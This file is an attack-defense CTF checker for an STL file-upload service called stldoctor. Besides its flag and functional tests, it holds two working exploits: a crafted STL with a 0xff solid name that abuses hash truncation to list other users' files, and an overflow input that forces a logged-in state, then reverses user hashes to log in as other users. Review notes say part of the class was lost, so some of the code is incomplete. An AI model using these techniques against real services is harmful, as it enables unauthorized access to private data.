#!/usr/bin/env python3
"""Checker for the ``stldoctor`` service, built on the ``enochecker`` framework.

The checker uploads generated STL models (flags and noise), retrieves them
again through the service's ``search`` / ``list`` commands, verifies the
reported model metadata and carries exploits for both flag stores.

NOTE(review): the text this file was restored from had all line structure
collapsed, so indentation below is re-derived from syntax. In addition, a span
in the middle of the class was missing entirely; see the NOTE(review) markers
in ``genfile_bin`` and above ``do_list``.
"""

import logging
import math
import os
import random
import re
import selectors
import socket
import string
import struct
import subprocess
import time
from io import BytesIO

import numpy as np
from enochecker import BaseChecker, BrokenServiceException, EnoException, run
from enochecker.utils import SimpleSocket
from faker import Faker
from stl import mesh

logging.getLogger("faker").setLevel(logging.WARNING)
logging.getLogger("pwnlib").setLevel(logging.WARNING)
logging.getLogger("_curses").setLevel(logging.CRITICAL)

rand = random.SystemRandom()

# ASCII STL whose solid name ends in a raw 0xff byte; used by exploit variant 0.
# NOTE(review): line breaks and indentation inside this literal were collapsed
# to single spaces in the reviewed text and are restored here following the
# one-statement-per-line layout genfile_ascii emits -- confirm against upstream.
evil_file = b"""
solid test\xff
  facet normal 0 0 1.0
    outer loop
      vertex 1 0 0
      vertex 1 1 0
      vertex 0 1 0
    endloop
  endfacet
endsolid test\xff
"""

# Characters allowed in generated identifiers. The lowercase run previously
# skipped "n" ("...klmopq..."), which silently dropped that letter from names.
generic_alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-+.!"


def ensure_bytes(v):
    """Return *v* as bytes, encoding ``str`` input.

    Raises:
        BrokenServiceException: if *v* is neither ``bytes`` nor ``str``.
    """
    if isinstance(v, bytes):
        return v
    if isinstance(v, str):
        return v.encode()
    raise BrokenServiceException("Tried to pass non str/bytes to bytes arg")


def includes_all(resp, targets):
    """Return True when every entry of *targets* occurs in the bytes *resp*."""
    return all(ensure_bytes(m) in resp for m in targets)


def includes_any(resp, targets):
    """Return True when at least one entry of *targets* occurs in *resp*."""
    return any(ensure_bytes(m) in resp for m in targets)


def fakeid():
    """Generate a name-like identifier (bytes) that is safe for ASCII STL parsing.

    The first part is a fake person name filtered to ``generic_alphabet``,
    cut to 12 characters and padded with "." to at least 10; eight random
    alphabet characters are appended.
    """
    fake = Faker(["en_US"])
    name_chars = [ord(c) for c in fake.name().replace(" ", "") if c in generic_alphabet]
    idstr = bytes(name_chars[:12]).ljust(10, b".")
    idstr += bytes(ord(rand.choice(generic_alphabet)) for _ in range(8))
    return idstr


def havocid():
    """Generate 10-40 random bytes with values in the range 32..127 (inclusive)."""
    idlen = rand.randint(10, 40)
    return bytes(rand.randint(32, 127) for _ in range(idlen))


def approx_equal(f1, f2, precision=2):
    """Compare two floats after rounding both to *precision* decimal places."""
    return round(f1, precision) == round(f2, precision)


def reverse_hash(hashstr):
    """Find a preimage for a user hash with the external ``REVHASH_PATH`` tool.

    Args:
        hashstr: the hash as ``str`` or ``bytes``.

    Returns:
        The tool's output (bytes) without its final byte.

    Raises:
        EnoException: if ``REVHASH_PATH`` is not configured.
        BrokenServiceException: if the hash is not decodable text or the tool
            printed no preimage.
    """
    if isinstance(hashstr, bytes):
        try:
            hashstr = hashstr.decode()
        except UnicodeDecodeError as ex:
            # The hash comes from the service; garbage here is its fault.
            raise BrokenServiceException(f"User hash is not valid text: {hashstr!r}") from ex

    tool = os.getenv("REVHASH_PATH")
    if not tool:
        # Without this check subprocess would fail with an opaque TypeError.
        raise EnoException("REVHASH_PATH is not set, unable to reverse user hashes")

    data = subprocess.check_output([tool, hashstr])[:-1]
    if data == b"":
        raise BrokenServiceException(f"Failed to find hash preimage of {hashstr}")
    return data


def check_line(conn, context):
    """Read one line from *conn* and fail if it carries an ``ERR:`` marker."""
    line = conn.recvline()
    if b"ERR:" in line:
        raise BrokenServiceException(f"{context}: Unexpected error message\n")
    return line


def parse_int(intstr):
    """Parse *intstr* as int; return None when it is not a valid integer."""
    try:
        return int(intstr)
    except (TypeError, ValueError):
        return None


def parse_float(floatstr):
    """Parse *floatstr* as float; return None when it is not a valid number."""
    try:
        return float(floatstr)
    except (TypeError, ValueError):
        return None


def has_alph(data, alph):
    """Return True when every element of *data* is contained in *alph*."""
    return all(v in alph for v in data)


def assert_match(data, pattern, exception):
    """Search *data* for *pattern* and return the first group (or whole match).

    Raises:
        exception: instantiated with a message when the pattern does not match.
    """
    rem = re.search(pattern, data)
    if rem is None:
        raise exception(f"Expected pattern {pattern} to match {data}")
    if rem.groups():
        return rem.group(1)
    return rem.group(0)


class STLDoctorChecker(BaseChecker):
    """enochecker implementation for the stldoctor service."""

    service_name = "stldoctor"
    port = 9090
    flag_variants = 2
    noise_variants = 2
    havoc_variants = 16
    exploit_variants = 2

    # Shell prompt the service prints when it is ready for the next command.
    prompt = b"\r$ "

    # HELPER FUNCS #

    def querydb(self, *args):
        """Fetch the given keys from ``self.chain_db``, in order.

        Raises:
            BrokenServiceException: if any key is missing.
        """
        vals = []
        for arg in args:
            try:
                vals.append(self.chain_db[arg])
            except KeyError as ex:
                raise BrokenServiceException(f"Invalid db contents, missing: {arg}") from ex
        return vals

    def postdb(self, **kwdict):
        """Store the keyword arguments as this task chain's database contents."""
        self.chain_db = kwdict

    def genfile_ascii(self, solidname, malformed=None):
        """Generate a random ASCII STL file with 4-30 facets.

        Args:
            solidname: name written after ``solid`` / ``endsolid`` (str or bytes).
            malformed: None for a valid file, or 1 (misspelled ``normal``
                keyword), 2 (wrong keyword case in ``outer loop``) or
                3 (no ``endsolid`` line).

        Returns:
            The file contents as bytes.
        """
        indent = bytes(rand.choice(b"\t ") for _ in range(rand.randint(1, 4)))
        solidname = ensure_bytes(solidname)
        facet_count = rand.randint(4, 30)

        parts = [b"solid " + solidname + b"\n" if solidname else b"solid\n"]

        for _ in range(facet_count):
            # MALFORM 1: wrong keyword
            keyword = b"facet nornal " if malformed == 1 else b"facet normal "
            parts.append(indent + keyword)

            vs = [[rand.random() for _ in range(3)] for _ in range(3)]
            norm = np.cross(np.subtract(vs[1], vs[0]), np.subtract(vs[2], vs[0]))
            norm = norm / np.linalg.norm(norm)
            parts.append(" ".join(f"{v:.2f}" for v in norm).encode() + b"\n")

            # MALFORM 2: wrong keyword case
            loop_line = b"outer lOop\n" if malformed == 2 else b"outer loop\n"
            parts.append(indent * 2 + loop_line)

            for vertex in vs:
                coords = " ".join(f"{v:.2f}" for v in vertex).encode()
                parts.append(indent * 3 + b"vertex " + coords + b"\n")

            parts.append(indent * 2 + b"endloop\n")
            parts.append(indent + b"endfacet\n")

        # MALFORM 3: no endsolid keyword
        if malformed != 3:
            parts.append(b"endsolid " + solidname + b"\n" if solidname else b"endsolid\n")

        return b"".join(parts)

    def genfile_bin(self, solidname, malformed=None):
        """Generate a random binary STL file (implementation currently incomplete).

        Args:
            solidname: name embedded in the 80-byte header; at most 78 bytes.
            malformed: None for a valid file, or a malformation variant.

        Raises:
            EnoException: if *solidname* does not fit into the header, and --
                until the lost code is restored -- on every call.
        """
        solidname = ensure_bytes(solidname)
        facet_count = rand.randint(4, 30)

        if len(solidname) > 78:
            raise EnoException("Solidname to embed in header is larger than header itself")

        # "#" + name padded to 78 bytes + NUL gives the 80-byte header. The
        # old ``solidname != ""`` test compared bytes with str (always true);
        # the padding expression already covers the empty name.
        content = b"#" + solidname.ljust(78, b"\x00") + b"\x00"

        # MALFORM 1: specify more facets than are in the file
        #
        # NOTE(review): the reviewed text breaks off inside the
        # ``struct.pack("`` call that followed the comment above. The facet
        # count / facet serialization and the remaining malformation variants
        # are missing. They are deliberately NOT guessed here; restore them
        # from the upstream checker. ``content`` and ``facet_count`` are kept
        # so the restored code can continue from this point.
        raise EnoException(
            "genfile_bin is incomplete: facet serialization is missing from the checker source"
        )

    # NOTE(review): the same lost span also swallowed every definition between
    # genfile_bin and the tail of do_list. The rest of this class calls the
    # following methods, none of which is defined in the reviewed text:
    #   self.genfile(solidname, filetype, malformed=...)
    #   self.parse_stlinfo(stlfile)
    #   self.openconn() / self.closeconn(conn)
    #   self.do_auth(conn, authstr)   (result is used as a truth value)
    # self.search_flag_bytes(...) is also not defined here; presumably it is
    # inherited from BaseChecker -- confirm. Restore these from upstream.

    def do_list(self, conn, check=True):
        """List the private files of the current user.

        NOTE(review): only the part from the ``not in resp`` test onwards is
        original. The signature, the ``list`` command and the read up to the
        prompt are reconstructed from call sites and from the other ``do_*``
        helpers, and the leading ``b">`` of the marker was cut off as well
        (``b">> "`` chosen to match the ``b">> ."`` test in the exploit).
        Confirm all of this against upstream.

        Returns:
            The raw response, or None when nothing was listed and *check* is
            false.

        Raises:
            BrokenServiceException: when nothing was listed and *check* is true.
        """
        conn.write("list\n")
        resp = conn.recvuntil(self.prompt)

        if b">> " not in resp:
            if check:
                raise BrokenServiceException(f"Failed to list private files:\n{resp}")
            return None
        return resp

    def do_upload(self, conn, modelname, stlfile, check=True):
        """Upload *stlfile* under *modelname* and return the assigned model ID.

        Returns:
            The model ID (bytes), or None when the service reported an error
            and *check* is false.

        Raises:
            BrokenServiceException: on a service error with *check* true, or
                when the success line contains no model ID.
        """
        modelname = ensure_bytes(modelname)

        # Upload file
        self.debug(f"Uploading model with name {modelname}")
        conn.write("upload\n")
        conn.write(modelname + b"\n")
        conn.write(f"{len(stlfile)}\n")
        conn.write(stlfile)

        # Check for errors
        conn.recvline()  # Modelname:
        line = conn.recvline()
        if b"ERR:" in line:
            if check:
                raise BrokenServiceException(f"Failed to upload model {modelname}:\n{line}")
            conn.recvuntil(self.prompt)
            return None

        # Parse ID: text between the first "with ID " and the last "!".
        # Same split order as before, without the raise/bare-except detour.
        _, marker, modelid = line.rsplit(b"!", 1)[0].partition(b"with ID ")
        if not marker or not modelid:
            raise BrokenServiceException(f"Invalid response during upload of {modelname}:\n{line}")

        conn.recvuntil(self.prompt)
        return modelid

    def do_search(self, conn, modelname, download=False, check=True):
        """Search for *modelname*, select the first hit and optionally download it.

        Returns:
            ``(fileinfo, stlfile)`` as bytes (``stlfile`` is empty without
            *download*), or None when the search failed and *check* is false.

        Raises:
            BrokenServiceException: on a service error with *check* true, or
                on an unparsable download size.
        """
        modelname = ensure_bytes(modelname)

        # Initiate download
        self.debug(f"Retrieving model with name {modelname}")
        conn.write(b"search " + modelname + b"\n")
        conn.write("0\n")  # first result
        conn.write("y\n" if download else "n\n")
        conn.write("q\n")  # quit

        # Check if an error occured
        line = conn.recvline()
        if b"ERR:" in line:
            if check:
                raise BrokenServiceException(f"Failed to retrieve model {modelname}:\n{line}")
            if b"Couldn't find a matching scan result" in line:
                # collect all the invalid commands sent after (hacky)
                for _ in range(4):
                    conn.recvuntil(self.prompt)
            # NOTE(review): placement of this return (any ERR, not only the
            # "no match" case) is inferred from the collapsed text -- confirm.
            return None

        # Recv until end of info box
        fileinfo = line + conn.recvuntil("================== \n")

        stlfile = b""
        if download:
            # Parse file contents
            conn.recvuntil(b"Here you go.. (")
            resp = conn.recvuntil(b"B)\n")[:-3]
            size = parse_int(resp)
            if size is None:
                raise BrokenServiceException(f"Received invalid download size, response:\n{resp}")

            self.debug(f"Download size: {size}")
            stlfile = conn.recvn(size)

        conn.recvuntil(self.prompt)
        return fileinfo, stlfile

    # CHECK WRAPPERS #

    def check_listed(self, conn, includes):
        """Require that the listing succeeds and contains all of *includes*."""
        resp = self.do_list(conn, check=True)
        if not includes_all(resp, includes):
            raise BrokenServiceException(f"Failed to find {includes} in listing:\n{resp}")
        return resp

    def check_not_listed(self, conn, excludes, fail=False):
        """Require that the listing contains none of *excludes*.

        With *fail* true the listing itself must fail; otherwise it must
        succeed.
        """
        resp = self.do_list(conn, check=False)
        if fail and resp:
            raise BrokenServiceException(f"Expected list to fail, but returned:\n{resp}")
        if not fail and not resp:
            raise BrokenServiceException(f"List failed unexpectedly:\n{resp}")
        if resp and includes_any(resp, excludes):
            raise BrokenServiceException(f"Unexpectedly found one of {excludes} in listing:\n{resp}")
        return resp

    def check_in_search(self, conn, modelname, includes, download=False):
        """Require that searching *modelname* succeeds and shows all of *includes*."""
        info, stlfile = self.do_search(conn, modelname, download, check=True)
        if not includes_all(info + stlfile, includes):
            # The message used to format an undefined ``resp`` and therefore
            # died with a NameError instead of reporting the service fault.
            raise BrokenServiceException(
                f"Retrieved info for {modelname} is missing {includes}: {info}"
            )
        return info, stlfile

    def check_not_in_search(self, conn, modelname, excludes, download=False, fail=False):
        """Require that searching *modelname* shows none of *excludes*.

        With *fail* true the search itself must fail; otherwise it must
        succeed.
        """
        resp = self.do_search(conn, modelname, download, check=False)
        combined = resp[0] + resp[1] if resp else None

        if fail and resp:
            # Previously a plain string: the placeholders were never filled in.
            raise BrokenServiceException(
                f"Search for {modelname} succeeded unexpectedly:\n{combined}"
            )
        if not fail and not resp:
            raise BrokenServiceException(f"Search for {modelname} failed unexpectedly:\n{resp}")
        if resp and includes_any(combined, excludes):
            # Previously referenced the undefined name ``includes``.
            raise BrokenServiceException(
                f"Unexpectedly {modelname} info contains one of {excludes}: {combined}"
            )
        return resp

    def check_hash(self, hashstr):
        """Require *hashstr* (bytes) to consist only of lowercase hex digits."""
        if not has_alph(hashstr, b"0123456789abcdef"):
            raise BrokenServiceException("Hash is not a hexadecimal number")

    def check_stlinfo(self, resp, ref_info, ref_modelid=None, ref_modelname=None, ref_solidname=None):
        """Compare the info box *resp* printed by the service with reference values.

        Args:
            resp: raw info text (bytes).
            ref_info: mapping with the keys ``size``, ``triangle_count``,
                ``bb_size`` and ``bb_origin``.
            ref_modelid, ref_modelname, ref_solidname: optional expected
                values; falsy values skip the respective comparison.

        Raises:
            BrokenServiceException: on any missing, malformed or mismatching
                field.
        """
        size = parse_int(assert_match(resp, b"File Size: (.*)\n", BrokenServiceException))
        if not size or size != ref_info["size"]:
            raise BrokenServiceException(
                f"STL info returned no / invalid file size: {size} != {ref_info['size']}"
            )

        # A second, float-based triangle count comparison used to follow the
        # bounding box checks; it could never fail once this one passed.
        triangle_count = parse_int(assert_match(resp, b"Triangle Count: (.*)\n", BrokenServiceException))
        if not triangle_count or triangle_count != ref_info["triangle_count"]:
            raise BrokenServiceException(
                f"STL info returned no / invalid triangle count: {triangle_count} != {ref_info['triangle_count']}"
            )

        for pattern, key, noun in (
            (b"Bounding Box Size: (.*)\n", "bb_size", "size"),
            (b"Bounding Box Origin: (.*)\n", "bb_origin", "origin"),
        ):
            raw = assert_match(resp, pattern, BrokenServiceException)
            values = [parse_float(v) for v in raw.split(b" x ")]
            # The length check keeps a short vector from raising IndexError.
            if len(values) != 3 or None in values:
                raise BrokenServiceException(f"STL info returned invalid bounding box {noun}: {raw}")
            if not all(approx_equal(values[i], ref_info[key][i]) for i in range(3)):
                raise BrokenServiceException(
                    f"Bounding box {noun} doesnt match: (REF) {ref_info[key]} {values}"
                )

        for expected, pattern, label in (
            (ref_modelname, b"Model Name: (.*)\n", "modelname"),
            (ref_modelid, b"Model ID: (.*)\n", "modelid"),
            (ref_solidname, b"Solid Name: (.*)\n", "solidname"),
        ):
            if not expected:
                continue
            actual = assert_match(resp, pattern, BrokenServiceException)
            if actual != expected:
                raise BrokenServiceException(f"Got {label} {actual}, expected {expected}")

    # TEST METHODS #

    def test_good_upload(self, filetype, register):
        """Upload a valid file and verify it from the same and from a new session.

        Args:
            filetype: file type passed to ``genfile``.
            register: whether to authenticate (private upload) first.
        """
        # ASCII Solidname cant be havocid since it might mess with parsing
        solidname = fakeid() if filetype == "ascii" else havocid()
        modelname = havocid()
        authstr = havocid()
        stlfile = self.genfile(solidname, filetype)

        # Calculate properties to test response against
        ref_info = self.parse_stlinfo(stlfile)

        # Create new session and user and upload file
        conn = self.openconn()
        if register:
            self.do_auth(conn, authstr)
        modelid = self.do_upload(conn, modelname, stlfile)
        self.check_hash(modelid)
        expected = [modelname, solidname, stlfile, modelid]
        info, _ = self.check_in_search(conn, modelname, expected, download=True)
        self.check_stlinfo(info, ref_info, ref_modelname=modelname,
                           ref_modelid=modelid, ref_solidname=solidname)
        if register:
            self.check_listed(conn, [modelname, modelid + b"-"])
        self.closeconn(conn)

        # Try getting file from a new session
        conn = self.openconn()
        if register:
            # The search must fail before authenticating.
            self.check_not_in_search(conn, modelname, expected, download=True, fail=True)
            self.do_auth(conn, authstr)
            info, _ = self.check_in_search(conn, modelname, expected, download=True)
            self.check_stlinfo(info, ref_info, ref_modelname=modelname,
                               ref_modelid=modelid, ref_solidname=solidname)
            self.check_listed(conn, [modelname, modelid + b"-"])
        else:
            info, _ = self.check_in_search(conn, modelname, expected, download=True)
            self.check_stlinfo(info, ref_info, ref_modelname=modelname,
                               ref_modelid=modelid, ref_solidname=solidname)
        self.closeconn(conn)

    def test_bad_upload(self, filetype, variant):
        """Require that the service rejects a malformed file of the given variant."""
        stlfile = self.genfile(fakeid(), filetype, malformed=variant)

        conn = self.openconn()
        if self.do_upload(conn, fakeid(), stlfile, check=False):
            raise BrokenServiceException(f"Able to upload malformed file:\n{stlfile}")
        self.closeconn(conn)

    def test_search(self, registered=False):
        """Upload a model; an unrelated name must not find it, its own name must."""
        solidname = fakeid()
        modelname = fakeid()
        modelname2 = fakeid()
        authstr = fakeid()
        stlfile = self.genfile(solidname, "bin")

        conn = self.openconn()
        if registered:
            self.do_auth(conn, authstr)
        modelid = self.do_upload(conn, modelname, stlfile)
        self.check_not_in_search(conn, modelname2, [modelname, modelid], download=True, fail=True)
        self.check_in_search(conn, modelname, [modelname, modelid], download=True)
        self.closeconn(conn)

    def test_list(self, registered=False):
        """Upload as one user, then check the file is hidden from other sessions.

        With *registered* the second session logs in as a different user and
        must get a listing without the file; otherwise it stays anonymous and
        the listing must fail.
        """
        solidname = fakeid()
        modelname = fakeid()
        authstr = fakeid()
        authstr2 = fakeid()
        stlfile = self.genfile(solidname, "bin")

        conn = self.openconn()
        self.do_auth(conn, authstr)
        modelid = self.do_upload(conn, modelname, stlfile)
        self.check_listed(conn, [modelname, modelid + b"-"])
        self.closeconn(conn)

        conn = self.openconn()
        if registered:
            if self.do_auth(conn, authstr2):
                # Previously a plain string, so {authstr2} was printed verbatim.
                raise BrokenServiceException(f"New authstr {authstr2} has user dir")
            self.check_not_listed(conn, [modelid, modelname])
        else:
            self.check_not_listed(conn, [modelid, modelname], fail=True)
        self.closeconn(conn)

    # CHECKER METHODS #

    def putflag(self) -> None:
        """Store the flag as a model's solid name.

        Variant 0 uploads an ASCII file anonymously, variant 1 a binary file
        as an authenticated user.
        """
        if self.variant_id not in (0, 1):
            raise EnoException(f"Invalid putflag variant ({self.variant_id}) provided")

        modelname = fakeid()
        types = ["ascii", "bin"]
        registered = self.variant_id == 1
        stlfile = self.genfile(self.flag, types[self.variant_id])
        authstr = fakeid() if registered else ""

        conn = self.openconn()
        if registered:
            self.do_auth(conn, authstr)
        modelid = self.do_upload(conn, modelname, stlfile)
        self.closeconn(conn)

        self.postdb(modelid=modelid, modelname=modelname, authstr=authstr)

    def getflag(self) -> None:
        """Retrieve the model stored by ``putflag`` and require the flag in it."""
        if self.variant_id not in (0, 1):
            raise EnoException(f"Invalid getflag variant ({self.variant_id}) provided")

        modelid, modelname, authstr = self.querydb("modelid", "modelname", "authstr")
        registered = self.variant_id == 1

        conn = self.openconn()
        if registered:
            self.do_auth(conn, authstr)
        info, stlfile = self.do_search(conn, modelname, download=True)
        if self.flag.encode() not in info + stlfile:
            raise BrokenServiceException(f"Flag {self.flag} not found in search:\n{info}\n{stlfile}")
        self.closeconn(conn)

    def putnoise(self) -> None:
        """Store a noise model.

        Variant 0 uploads a binary file anonymously, variant 1 an ASCII file
        as an authenticated user.
        """
        if self.variant_id not in (0, 1):
            raise EnoException(f"Invalid putnoise variant ({self.variant_id}) provided")

        modelname = fakeid()
        solidname = fakeid()
        types = ["bin", "ascii"]
        registered = self.variant_id == 1
        authstr = fakeid() if registered else ""
        stlfile = self.genfile(solidname, types[self.variant_id])

        conn = self.openconn()
        if registered:
            self.do_auth(conn, authstr)
        modelid = self.do_upload(conn, modelname, stlfile)
        self.closeconn(conn)

        self.postdb(modelid=modelid, modelname=modelname, solidname=solidname,
                    stlfile=stlfile, authstr=authstr)

    def getnoise(self) -> None:
        """Retrieve the model stored by ``putnoise`` and verify its contents."""
        if self.variant_id not in (0, 1):
            raise EnoException(f"Invalid noise variant ({self.variant_id}) provided")

        modelid, modelname, solidname, stlfile, authstr = self.querydb(
            "modelid", "modelname", "solidname", "stlfile", "authstr"
        )
        registered = self.variant_id == 1
        expected = [modelname, solidname, stlfile, modelid]

        conn = self.openconn()
        if registered:
            self.do_auth(conn, authstr)
        self.check_in_search(conn, modelname, expected, download=True)
        self.closeconn(conn)

    def havoc(self) -> None:
        """Run the functional test selected by ``self.variant_id`` (0-15)."""
        variants = {
            0: (self.test_good_upload, ("ascii", False)),
            1: (self.test_good_upload, ("bin", False)),
            2: (self.test_good_upload, ("ascii", True)),
            3: (self.test_good_upload, ("bin", True)),
            4: (self.test_bad_upload, ("ascii", 1)),
            5: (self.test_bad_upload, ("ascii", 2)),
            6: (self.test_bad_upload, ("ascii", 3)),
            7: (self.test_bad_upload, ("bin", 1)),
            8: (self.test_bad_upload, ("bin", 2)),
            9: (self.test_bad_upload, ("bin", 3)),
            10: (self.test_bad_upload, ("garbage", 1)),
            11: (self.test_bad_upload, ("garbage-tiny", 1)),
            12: (self.test_search, (False,)),
            13: (self.test_search, (True,)),
            14: (self.test_list, (False,)),
            15: (self.test_list, (True,)),
        }
        entry = variants.get(self.variant_id)
        if entry is None:
            raise EnoException(f"Invalid havoc variant ({self.variant_id}) provided")
        test, args = entry
        test(*args)

    def exploit(self):
        """Run the exploit selected by ``self.variant_id`` and return the flag found.

        Raises:
            BrokenServiceException: if the exploit did not yield a flag.
            EnoException: on an unknown variant.
        """
        if self.variant_id == 0:
            return self._exploit_hash_truncation()
        if self.variant_id == 1:
            return self._exploit_auth_overflow()
        raise EnoException(f"Invalid exploit variant ({self.variant_id}) provided")

    def _exploit_hash_truncation(self):
        """Flag store 1: enumerate other models via the evil file and ``search last``."""
        modelname = fakeid()

        # Upload evil file for parse via search for hash truncation
        self.debug("Uploading evil file for hash truncation")
        conn = self.openconn()
        self.do_upload(conn, modelname, stlfile=evil_file)
        self.do_search(conn, modelname, download=False)
        conn.write("search last\n")
        listing = conn.recvuntil("? ")
        filelist = [
            entry.strip().split(b" : ")[1]
            for entry in listing.split(b"\n")
            if b" : " in entry
        ]
        if not filelist:
            raise BrokenServiceException("Failed to list files through search")

        # Use it to enumerate other files and grab contents
        found = None
        self.debug("Targets:\n" + "\n".join(" - " + h.decode("latin1") for h in filelist))
        for i, fhash in enumerate(filelist):
            self.debug(f"Retrieving file {fhash} at index {i}")
            conn.write(f"{i}\nn\n")
            resp = conn.recvuntil("==================")
            resp += conn.recvuntil("? ")
            found = self.search_flag_bytes(resp)
            if found is not None or i == len(filelist) - 1:
                break

        # Done!
        conn.write("q\n")
        conn.recvuntil(self.prompt)
        self.closeconn(conn)

        if found is None:
            raise BrokenServiceException("Exploit for flagstore 1 failed")
        return found

    def _exploit_auth_overflow(self):
        """Flag store 2: set ``loggedin`` by overflow, list user hashes, log in as each."""
        # Overflow loggedin variable
        conn = self.openconn()
        conn.write(b"search \xff\xff\xff\xff\xff0000000000000000\n")
        conn.recvuntil(self.prompt)
        conn.write("auth\n")
        if b"Already logged in!" not in conn.recvuntil(self.prompt):
            raise BrokenServiceException("Exploit did not set 'loggedin' variable via overflow")

        # Get private user hashes via 'list'
        resp = self.do_list(conn)
        self.debug("List response: " + str(resp))
        users = [entry.split(b" .")[1] for entry in resp.split(b"\n") if b">> ." in entry]
        if not users:
            raise BrokenServiceException("Unable to list private user hashes")
        self.closeconn(conn)

        # Login as each private user
        found = None
        for u in users:
            # Find preimage of user hash
            self.debug(f"Logging in as user with id {u}")
            user = reverse_hash(u)

            # Authenticate and check if the user is new
            conn = self.openconn()
            if not self.do_auth(conn, user):
                self.closeconn(conn)
                # We dont raise an exception, because it could be that user dir was cleaned
                # up just before we logged in, not necessarily because of an invalid prehash.
                # If there was a problem with the preimage generation, we wont find a flag and
                # an exception will be raised later anyways...
                continue

            # List all private files of user
            resp = self.do_list(conn)
            self.closeconn(conn)

            # Search for flag in solid names
            names = b"\n".join(
                entry.split(b": ", 1)[1]
                for entry in resp.split(b"\n")
                if b"Solid Name: " in entry
            )
            found = self.search_flag_bytes(names)
            if found is not None:
                break

        if found is None:
            raise BrokenServiceException("Exploit for flagstore 2 failed")
        return found


app = STLDoctorChecker.service  # This can be used for uWSGI.
# Script entry point: hand the checker class to enochecker's runner.
if __name__ == "__main__":
    run(STLDoctorChecker)